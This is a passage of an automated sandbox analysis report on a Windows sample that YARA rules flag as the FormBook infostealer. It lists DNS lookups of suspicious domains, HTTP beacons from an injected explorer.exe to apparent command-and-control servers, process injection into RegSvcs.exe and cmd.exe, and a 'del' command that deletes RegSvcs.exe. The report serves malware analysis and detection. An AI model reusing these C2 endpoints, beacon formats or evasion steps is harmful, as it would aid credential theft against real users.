                                                              Sep 15, 2021 10:39:30.354182959 CEST6033853192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:30.383783102 CEST53603388.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:30.958170891 CEST5871753192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:30.997869968 CEST53587178.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:31.556978941 CEST5976253192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:31.584739923 CEST53597628.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:32.320761919 CEST5432953192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:32.345835924 CEST53543298.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:33.259136915 CEST5805253192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:33.285986900 CEST53580528.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:33.685039043 CEST5400853192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:33.712068081 CEST53540088.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:37.825959921 CEST5945153192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:37.861711979 CEST53594518.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:40:17.770468950 CEST5291453192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:40:17.801754951 CEST53529148.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:40:18.896472931 CEST6456953192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:40:18.937084913 CEST53645698.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:40:21.522937059 CEST5281653192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:40:21.552311897 CEST53528168.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:40:22.819891930 CEST5078153192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:40:22.864661932 CEST53507818.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:40:27.972635031 CEST5423053192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:40:28.970036983 CEST5423053192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:40:29.799778938 CEST53542308.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:40:30.778945923 CEST53542308.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:40:34.846492052 CEST5491153192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:40:34.879271030 CEST53549118.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:40:44.972348928 CEST4995853192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:40:45.377986908 CEST53499588.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:40:50.800831079 CEST5086053192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:40:51.148735046 CEST53508608.8.8.8192.168.2.7

                                                              ICMP Packets

                                                              TimestampSource IPDest IPChecksumCodeType
                                                              Sep 15, 2021 10:40:30.779090881 CEST192.168.2.78.8.8.8cffb(Port unreachable)Destination Unreachable

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Sep 15, 2021 10:40:17.770468950 CEST192.168.2.78.8.8.80x3f3cStandard query (0)www.ice-lemon.proA (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:22.819891930 CEST192.168.2.78.8.8.80x424aStandard query (0)www.indianadogeavaxsite.siteA (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:27.972635031 CEST192.168.2.78.8.8.80x4193Standard query (0)www.pierrot-bros.comA (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:28.970036983 CEST192.168.2.78.8.8.80x4193Standard query (0)www.pierrot-bros.comA (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:34.846492052 CEST192.168.2.78.8.8.80x5287Standard query (0)www.munortiete.comA (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:44.972348928 CEST192.168.2.78.8.8.80x14a0Standard query (0)www.438451.comA (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:50.800831079 CEST192.168.2.78.8.8.80xc584Standard query (0)www.fanpaixiu.xyzA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Sep 15, 2021 10:40:17.801754951 CEST8.8.8.8192.168.2.70x3f3cServer failure (2)www.ice-lemon.prononenoneA (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:22.864661932 CEST8.8.8.8192.168.2.70x424aNo error (0)www.indianadogeavaxsite.sitedomains.readymag.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 15, 2021 10:40:22.864661932 CEST8.8.8.8192.168.2.70x424aNo error (0)domains.readymag.com54.194.41.141A (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:29.799778938 CEST8.8.8.8192.168.2.70x4193Server failure (2)www.pierrot-bros.comnonenoneA (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:30.778945923 CEST8.8.8.8192.168.2.70x4193Server failure (2)www.pierrot-bros.comnonenoneA (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:34.879271030 CEST8.8.8.8192.168.2.70x5287No error (0)www.munortiete.com172.67.147.111A (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:34.879271030 CEST8.8.8.8192.168.2.70x5287No error (0)www.munortiete.com104.21.71.167A (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:45.377986908 CEST8.8.8.8192.168.2.70x14a0No error (0)www.438451.com160.202.170.147A (IP address)IN (0x0001)
                                                              Sep 15, 2021 10:40:51.148735046 CEST8.8.8.8192.168.2.70xc584Name error (3)www.fanpaixiu.xyznonenoneA (IP address)IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • www.indianadogeavaxsite.site
                                                              • www.munortiete.com

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.74980954.194.41.14180C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Sep 15, 2021 10:40:22.916647911 CEST6201OUTGET /t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn HTTP/1.1
                                                              Host: www.indianadogeavaxsite.site
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Sep 15, 2021 10:40:22.963691950 CEST6201INHTTP/1.1 403 Forbidden
                                                              Server: nginx
                                                              Date: Wed, 15 Sep 2021 08:40:22 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 118
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              1192.168.2.749810172.67.147.11180C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Sep 15, 2021 10:40:34.909507036 CEST6203OUTGET /t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn HTTP/1.1
                                                              Host: www.munortiete.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Sep 15, 2021 10:40:34.941842079 CEST6204INHTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 15 Sep 2021 08:40:34 GMT
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Wed, 15 Sep 2021 09:40:34 GMT
                                                              Location: https://www.munortiete.com/t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tf19gfgwC210LIACe1vV29u1H4wndpzEQechmp6W8NM%2F%2BBin2oGR1mlmAEeHy867OF7b8VWH9BEaP2fn4MX%2Bi29fIOkrR25WYxU0SDHleBOTosji4XBUZ%2Bk08tOt9qjCq1Gz6as%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 68f08d124ee7d6b5-FRA
                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                              Data Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Code Manipulations

                                                              Statistics

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Start time:10:38:35
                                                              Start date:15/09/2021
                                                              Path:C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe'
                                                              Imagebase:0xcd0000
                                                              File size:671232 bytes
                                                              MD5 hash:CE556CE97EA23CBC2940F2AAD45D468F
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.281632826.0000000002FA1000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:low

                                                              General

                                                              Start time:10:38:49
                                                              Start date:15/09/2021
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              Imagebase:0x410000
                                                              File size:45152 bytes
                                                              MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:10:38:50
                                                              Start date:15/09/2021
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              Imagebase:0x470000
                                                              File size:45152 bytes
                                                              MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:high

                                                              General

                                                              Start time:10:38:55
                                                              Start date:15/09/2021
                                                              Path:C:\Windows\explorer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\Explorer.EXE
                                                              Imagebase:0x7ff662bf0000
                                                              File size:3933184 bytes
                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:high

                                                              General

                                                              Start time:10:39:43
                                                              Start date:15/09/2021
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\cmd.exe
                                                              Imagebase:0x870000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:high

                                                              General

                                                              Start time:10:39:45
                                                              Start date:15/09/2021
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                              Imagebase:0x870000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:10:39:46
                                                              Start date:15/09/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff774ee0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >